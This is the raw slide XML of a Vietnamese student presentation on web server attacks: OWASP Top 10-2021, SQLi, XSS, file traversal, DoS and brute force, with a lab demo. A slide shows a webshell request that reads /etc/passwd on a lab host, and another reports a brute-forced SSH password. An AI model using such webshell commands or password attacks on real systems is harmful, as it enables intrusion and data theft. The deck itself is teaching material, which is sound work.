          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>1.3.2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Phân</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>tích</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>chính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>trong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> OWASP Top 10-2021</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0F227BBE-C519-3D97-657F-55BC90C69C9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22</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E146FE18-004D-33D4-0DC0-5E399640BA02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226541" y="1969322"/>
            <a:ext cx="4808357" cy="3336810"/>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A06:2021-Vulnerable and Outdated Components (Các thành phần dễ bị tổn thương và lỗi thời): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Sự phụ thuộc vào các thư viện bên thứ ba lỗi thời là điểm yếu nghiêm trọng.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7172" name="Picture 4" descr="OWASP Top 10 security vulnerabilities 2021 Evalian®">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A527C0A3-1AA4-E25F-EA8D-0EF9841B5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20294"/>
            <a:ext cx="3923030" cy="385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25176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48DEB-2B12-A811-8D31-81371A600C1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A29795A-1AF9-8F36-AE36-E6672D17E0B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2F480EDD-2F69-288B-89D6-0F21F697759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220</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20F633FB-F56A-3478-265F-0B02332AC140}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>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Cuối cùng ta có thể thực thi lệnh tinh vi hơn để lấy dữ liệu từ /etc/passwd/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="354965" indent="-342265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>http://192.168.164.132/css/webshell01.php?cmd=cat%20/etc/passwd.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{992064DE-F334-400B-D424-E7C1DD8CBC99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="315232" y="2256300"/>
            <a:ext cx="8513536" cy="3458700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30874851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97695-EFC3-AF39-1776-9032B35C033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3CDDDC5-B578-AB3B-E275-311B863B57E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12E722A5-81C8-11E6-ACCB-632AD1A80FD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221</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D61F25F-31F8-4687-F2D4-9D98B3ED9344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>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Cuối cùng ta có thể thực thi lệnh tinh vi hơn để lấy dữ liệu từ /etc/passwd/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="354965" indent="-342265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>http://192.168.164.132/css/webshell01.php?cmd=cat%20/etc/passwd.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44CDE5CA-F758-05A1-B51D-3DC2ED7F1A42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="315232" y="2256300"/>
            <a:ext cx="8513536" cy="3458700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38449761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F1537-C0CC-4760-65AC-6258C268AF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5EE4B96-5D2C-7FD0-30B7-5FFBBDCF773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17F6DCA4-CBDC-65A0-FA31-D9D8771A4D0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222</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C730B73-47C6-73A2-1847-79F89EA1DDCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>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Khai </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>thác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Directory</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73F0A094-7679-0ED3-16F8-D717A118AE05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="744644"/>
            <a:ext cx="7315200" cy="806041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{060ECDDA-4B91-782F-01C1-720AF769B5D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="147816" y="1774634"/>
            <a:ext cx="8996184" cy="3419666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39586959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5FCDD-46A3-0207-6A23-F66FDD8F20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A0C78A1-85CC-AFB4-F1C2-D5E323423EF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DF4B587D-3BC2-A932-77E7-7BB4A1AA8D4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223</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EBD750B-3134-2B78-32C2-FC9A33B775AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="177823"/>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Sau một thời gian thử các mật khẩu  thì ta tìm được password của tài khoản user trong dịch vụ SSH là : live</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACB3591C-105C-D544-5C08-5D6D31912D0E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="356274" y="1498508"/>
            <a:ext cx="8431452" cy="3581393"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35802001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B1204-D54D-2C4D-638A-C14EE9F15EA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1B822F8-2FA7-3864-B86B-87DA127F383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5FC87859-0903-58D7-47EE-50855ECF5C0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224</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD177777-C624-3412-2272-E6290F6E056D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1714500"/>
            <a:ext cx="8915400" cy="1767149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="104139" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>CÁM ƠN THẦY VÀ CÁC BẠN ĐÃ LẮNG NGHE!</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="5400" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3425173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EBCB6-D402-3854-0597-1BCB12FE3DC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29FF722-8BC7-C3B6-5E9E-905D3CD9F167}"/>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0A4C1F96-6A1F-BBF3-75AE-4D92E659136B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="295478"/>
            <a:ext cx="8684260" cy="1951816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>2. CÁC KỸ THUẬT TẤN CÔNG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t>WEB SERVER</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6C84B70-4FDB-2322-AB79-4A7E697C138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23</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80C2929B-5191-7E04-2CA4-DBBE17794142}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="1638300"/>
            <a:ext cx="8229600" cy="3952363"/>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2.1. Tấn công SQL Injection (SQLi)</a:t>
            </a:r>
          </a:p>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2.2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>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2.3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> File Traversal </a:t>
            </a:r>
          </a:p>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2.4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>từ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>chối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dịch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>vụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> (DoS/DDoS)</a:t>
            </a:r>
          </a:p>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2.5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>dò</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>mật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>khẩu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> (Brute-Force Attack)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="354965" indent="-342265">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC9900"/>
              </a:buClr>
              <a:buSzPct val="65000"/>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3000" b="1"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endParaRPr lang="vi-VN" sz="3000" b="1" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="367874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D30C1-AD93-1982-B113-901C8F9551B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D4103F3-C5DD-36A5-EAF1-F69506AEFBC8}"/>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5612B7A9-CD61-6630-1FBE-B98EC09B9C08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="295478"/>
            <a:ext cx="8455660" cy="1951816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
